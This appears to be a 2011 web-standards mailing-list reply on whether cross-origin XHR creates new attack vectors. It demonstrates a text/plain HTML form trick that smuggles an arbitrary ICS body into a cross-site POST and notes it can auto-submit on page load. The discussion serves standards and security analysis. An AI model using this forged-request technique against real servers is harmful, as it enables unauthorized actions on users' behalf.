On 8/3/11 5:03 AM, Philippe De Ryck wrote:
You can create pretty much any arbitrary message body you want using
application/x-www-form-urlencoded already by crafting smart names and
values so the real importance is in not being able to set Content-Type.
This is not a security problem as far as I can tell.
Using a form still results in the use of = and& in the body, even with crafted
names/values. Taking the ICS format as an example, this is very difficult to encode
in a normal form, but very easy with cross-origin XHR. This can leave legacy
servers open to a new attack vector.
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//hacksw/handcal//NONSGML v1.0//EN
BEGIN:VEVENT
UID:[email protected]
DTSTAMP:19970714T170000Z
ORGANIZER;CN=John Doe:MAILTO:[email protected]
DTSTART:19970714T170000Z
DTEND:19970715T035959Z
SUMMARY:Bastille Day Party
END:VEVENT
END:VCALENDAR
Trivial encoding of the above data in a normal form:
<!DOCTYPE html>
<form
action="put_your_echo_script_here_to_see_what_the_POST_data_looks_like"
method="POST"
enctype="text/plain">
<input type="hidden"
name="BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//hacksw/handcal//NONSGML v1.0//EN
BEGIN:VEVENT
UID:[email protected]
DTSTAMP:19970714T170000Z
ORGANIZER;CN"
value="John Doe:MAILTO:[email protected]
DTSTART:19970714T170000Z
DTEND:19970715T035959Z
SUMMARY:Bastille Day Party
END:VEVENT
END:VCALENDAR
">
<input type="submit" value="Send me some ICS!">
</form>
This can be done cross-site by browsers right this second. The submit
can be fully scripted, so doesn't even need user interaction. Just
loading a page with such a form can send your nice ICS data to any HTTP
server that the UA is willing to reach.
-Boris
